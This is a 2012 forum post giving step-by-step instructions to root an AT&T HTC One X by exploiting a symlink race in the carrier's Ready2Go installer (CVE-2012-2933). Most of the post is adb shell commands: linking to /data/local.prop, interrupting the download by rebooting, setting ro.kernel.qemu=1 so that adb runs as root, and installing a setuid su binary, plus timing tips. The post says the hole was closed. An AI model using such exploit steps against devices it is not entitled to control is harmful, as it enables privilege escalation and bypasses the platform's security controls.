Jump to content

  1. 0
  2. 0
  3. 0/5

Rate this Topic

- - - - -

How To Root An AT&T HTC One X (This exploit supports 1.85!)

  • Please log in to reply

OP jcase



  • 241 posts

Posted 25 May 2012 - 07:14 AM #1

Update: AT&T disabled the app install feature of the ready2go site around 4:45pm May 25th, thus breaking this. Unless they reenable it, no reason to try this anymore.

Congrats to those that got root out of it, sorry to those that didn't. Will continue research on another one.

For more details and to see the original post please check out my article here : http://www.androidpo...-85-or-earlier/

Please do not repost this or include it in a script. Timing is critical, putting it in a script will actually make it more of a pain, and may move discussion away from this thread.

This is for the AT&T variation only.

If you would found this exploit useful, and would like to donate the "omg Get jcase an HTC One X fund" please click -> http://kan.gd/1l7q

Required file:


First, ensure the "/data/install" directory exists, by using AT&t Ready2Go to download and install any app, then uninstall the app.

Next, pick an app that we know the file name of, in our case we used "AT&T Mark the Spot" and setup a symlink from that app's file name to local.prop

adb shell ln -s /data/local.prop /data/install/com.att.android.markthespot.apk
Now comes the timing critical part, you have to use ATT Ready2Go to Download "AT&T Mark the Spot", and interrupt the install process right after the download has finished. Easiest way is to reboot the device, but we have found other ways to do it.

adb reboot

One rebooted, we try and set the property allowing us to get root. If you get permission denied, then the timing was off (or if you are reading this in the future, it may have been patched) and start over.

adb shell "echo 'ro.kernel.qemu=1' > /data/local.prop"
adb reboot

One rebooted, adb will run as root, and now it is time to install su.

adb shell mount -o remount,rw /system
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
adb shell rm /data/install/*
adb shell rm /data/local.prop
adb reboot

Once rebooted, install the Superuser app from the market. If you want to unlock your boot loader after rooting, follow this thread.

Pro Tip

Here's the way I did it back when I did it:

  • Open 2 cmd windows
  • adb devices on both (to make sure daemon is running)
  • In first shell type adb reboot but do not execute (obviously!)
  • In second window, cd /data/install
  • Enter ls -l
  • Now tell Ready2Go to install.
  • In that second window SPAM "up arrow - enter" to repeatedly execute ls -l. Observe the .apk file growing in size. When it stops growing it's probably done downloading (I think it was around 5MB but it's been a while). Go back to that first window IMMEDIATELY and hit enter on that adb reboot you typed in. It's a small apk so you need to be fast.

This was my method. Hopefully it works for you! :)

The Common Vulnerabilities and Exposures (CVE) project has assigned
the name CVE-2012-2933 to this issue. This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.
Please don't PM me here, I will not likely read it as I do not check often.